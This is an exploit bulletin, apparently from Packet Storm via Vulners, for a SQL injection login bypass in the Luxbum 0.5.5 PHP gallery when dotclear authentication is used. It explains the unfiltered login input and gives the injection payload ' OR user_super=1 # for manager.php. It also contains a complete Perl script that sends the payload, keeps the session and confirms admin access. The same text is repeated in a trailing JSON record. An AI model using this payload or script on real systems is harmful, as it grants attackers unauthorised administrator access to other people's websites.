Search...

Luxbum 0.5.5 SQL Injection

2009-05-08T00:00:00

ID PACKETSTORM:77364
Type packetstorm
Reporter knxone
Modified 2009-05-08T00:00:00

Description

                                        
                                            ` __   
/\ \   
\ \ \/'\ ___ __ _ ___ ___ __   
\ \ , &lt; /' _ `\ /\ \/'\ / __`\ /' _ `\ /'__`\   
\ \ \\`\ /\ \/\ \\/&gt; &lt;//\ \L\ \/\ \/\ \/\ __/   
\ \_\ \_\ \_\ \_\/\_/\_\ \____/\ \_\ \_\ \____\  
\/_/\/_/\/_/\/_/\//\/_/\/___/ \/_/\/_/\/____/  
Better to be alone than in bad company  
  
  
  
  
  
+============+  
| MAIN INFOS |  
+============+  
  
Software name: luxbum (PHP Web gallery)  
Version: 0.5.5/stable  
Flaw type: sql injection -&gt; auth bypass   
URL: http://www.luxbum.net/  
Found by: knxone &lt;knxone[at]webmail(d0t)ru&gt;  
Greetings: _Pirata_ from this famous irc server ;)  
  
  
  
+=========+  
| CONCEPT |  
+=========+  
  
Luxbum allows authentification using dotclear username and password via MySQL,  
while the default auth mechanism uses a md5 hash of the pass in a PHP file.  
  
If you trace all the code from login form to admin panel, you'll notice that  
user input isn't filtered in manager.php or mysql.inc.php.   
  
So if you use dotclear auth in luxbum, SQL injection is possible but, in order  
to bypass, we need to return at least one row to get it working and it has to  
be a dotclear admin.   
  
In dotclear, the table dc_user stores in the column "user_super" the super  
admin status. If it's == 1 then the user is super-admin. Since the luxbum auth  
mechanism already fully accesses to dotclear users' data , exploiting is  
very easy and doesn't require the disclosure of dotclear database infos (DB  
name, username, pass, prefix etc.).  
  
  
  
+=========+  
| EXPLOIT |  
+=========+  
  
- requires magic_quotes = Off  
- requires use of dotclear auth (not default)  
  
  
Go to: http://host/luxbum/manager.php  
Enter as Username: ' OR user_super=1 #  
Enter as Password: xxxxxxxxxxxxxxxxxxxx  
  
  
  
+==============+  
| EXPLOIT CODE |  
+==============+  
  
#!/usr/bin/perl -w  
# luxbum 0.5.5 auth bypass via sql injection.  
# requires magic_quotes Off and use of dotclear auth  
# returns 0 if successful, else 1  
# ./luxbum http://host.tld/luxbumrootdir  
# By knxone &lt;knxone[at]webmail(d0t)ru&gt;  
use strict;  
use LWP::UserAgent;  
use HTTP::Cookies;  
use Term::ANSIColor qw(:constants);  
$Term::ANSIColor::AUTORESET = 1;  
help() if ( ! defined($ARGV[0]) || scalar(@ARGV) != 1 );  
  
  
my $ua = LWP::UserAgent-&gt;new(  
agent =&gt; 'Mozilla/4.73 [en] (U; Windows 3.1; Internet Explorer 2.0)',  
cookie_jar =&gt; HTTP::Cookies-&gt;new(  
file =&gt; ".cookies",  
autosave =&gt; 1   
)  
);  
my $url = $ARGV[0]."/manager.php?p=login";  
  
# First we inject to open a valid session  
my $req = HTTP::Request-&gt;new( POST =&gt; $url ) ;  
$req-&gt;content_type("application/x-www-form-urlencoded");  
$req-&gt;content("username='+OR+user_super%3D1%23&password=".'x'x32);  
my $response = $ua-&gt;request($req);  
if ( ! $response-&gt;is_error && $response-&gt;content !~ m/message_ko/ ) {  
print BOLD GREEN "Auth bypass successful :-)\n";  
} else {  
print BOLD RED "Auth bypass failed :-(\n";  
exit(1);  
}  
  
  
# Then we check if we've really done it  
$response = $ua-&gt;get($ARGV[0]."/manager.php");  
if ( $response-&gt;content =~ m/h1_admin/ ) {  
print BOLD GREEN "Access Granted as gallery Admin at ".$ARGV[0]." :-)))\n";  
exit(0);  
} else {  
print BOLD RED "Access Denied at ".$ARGV[0]." :-(\n";  
exit(1);  
}  
  
  
sub help {  
print "Usage: ".$0." http://host.tld/luxbumrootdir\n";  
exit(1);  
}  
  
#EOF  
  
  
  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:77364", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Luxbum 0.5.5 SQL Injection", "description": "", "published": "2009-05-08T00:00:00", "modified": "2009-05-08T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/77364/Luxbum-0.5.5-SQL-Injection.html", "reporter": "knxone", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:17:04", "viewCount": 1, "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2016-11-03T10:17:04", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:17:04", "rev": 2}, "vulnersScore": 0.1}, "sourceHref": "https://packetstormsecurity.com/files/download/77364/luxbum-sql.txt", "sourceData": "` __ \n/\\ \\ \n\\ \\ \\/'\\ ___ __ _ ___ ___ __ \n\\ \\ , < /' _ `\\ /\\ \\/'\\ / __`\\ /' _ `\\ /'__`\\ \n\\ \\ \\\\`\\ /\\ \\/\\ \\\\/> <//\\ \\L\\ \\/\\ \\/\\ \\/\\ __/ \n\\ \\_\\ \\_\\ \\_\\ \\_\\/\\_/\\_\\ \\____/\\ \\_\\ \\_\\ \\____\\ \n\\/_/\\/_/\\/_/\\/_/\\//\\/_/\\/___/ \\/_/\\/_/\\/____/ \nBetter to be alone than in bad company \n \n \n \n \n \n+============+ \n| MAIN INFOS | \n+============+ \n \nSoftware name: luxbum (PHP Web gallery) \nVersion: 0.5.5/stable \nFlaw type: sql injection -> auth bypass \nURL: http://www.luxbum.net/ \nFound by: knxone <knxone[at]webmail(d0t)ru> \nGreetings: _Pirata_ from this famous irc server ;) \n \n \n \n+=========+ \n| CONCEPT | \n+=========+ \n \nLuxbum allows authentification using dotclear username and password via MySQL, \nwhile the default auth mechanism uses a md5 hash of the pass in a PHP file. \n \nIf you trace all the code from login form to admin panel, you'll notice that \nuser input isn't filtered in manager.php or mysql.inc.php. \n \nSo if you use dotclear auth in luxbum, SQL injection is possible but, in order \nto bypass, we need to return at least one row to get it working and it has to \nbe a dotclear admin. \n \nIn dotclear, the table dc_user stores in the column \"user_super\" the super \nadmin status. If it's == 1 then the user is super-admin. Since the luxbum auth \nmechanism already fully accesses to dotclear users' data , exploiting is \nvery easy and doesn't require the disclosure of dotclear database infos (DB \nname, username, pass, prefix etc.). \n \n \n \n+=========+ \n| EXPLOIT | \n+=========+ \n \n- requires magic_quotes = Off \n- requires use of dotclear auth (not default) \n \n \nGo to: http://host/luxbum/manager.php \nEnter as Username: ' OR user_super=1 # \nEnter as Password: xxxxxxxxxxxxxxxxxxxx \n \n \n \n+==============+ \n| EXPLOIT CODE | \n+==============+ \n \n#!/usr/bin/perl -w \n# luxbum 0.5.5 auth bypass via sql injection. \n# requires magic_quotes Off and use of dotclear auth \n# returns 0 if successful, else 1 \n# ./luxbum http://host.tld/luxbumrootdir \n# By knxone <knxone[at]webmail(d0t)ru> \nuse strict; \nuse LWP::UserAgent; \nuse HTTP::Cookies; \nuse Term::ANSIColor qw(:constants); \n$Term::ANSIColor::AUTORESET = 1; \nhelp() if ( ! defined($ARGV[0]) || scalar(@ARGV) != 1 ); \n \n \nmy $ua = LWP::UserAgent->new( \nagent => 'Mozilla/4.73 [en] (U; Windows 3.1; Internet Explorer 2.0)', \ncookie_jar => HTTP::Cookies->new( \nfile => \".cookies\", \nautosave => 1 \n) \n); \nmy $url = $ARGV[0].\"/manager.php?p=login\"; \n \n# First we inject to open a valid session \nmy $req = HTTP::Request->new( POST => $url ) ; \n$req->content_type(\"application/x-www-form-urlencoded\"); \n$req->content(\"username='+OR+user_super%3D1%23&password=\".'x'x32); \nmy $response = $ua->request($req); \nif ( ! $response->is_error && $response->content !~ m/message_ko/ ) { \nprint BOLD GREEN \"Auth bypass successful :-)\\n\"; \n} else { \nprint BOLD RED \"Auth bypass failed :-(\\n\"; \nexit(1); \n} \n \n \n# Then we check if we've really done it \n$response = $ua->get($ARGV[0].\"/manager.php\"); \nif ( $response->content =~ m/h1_admin/ ) { \nprint BOLD GREEN \"Access Granted as gallery Admin at \".$ARGV[0].\" :-)))\\n\"; \nexit(0); \n} else { \nprint BOLD RED \"Access Denied at \".$ARGV[0].\" :-(\\n\"; \nexit(1); \n} \n \n \nsub help { \nprint \"Usage: \".$0.\" http://host.tld/luxbumrootdir\\n\"; \nexit(1); \n} \n \n#EOF \n \n \n \n`\n"}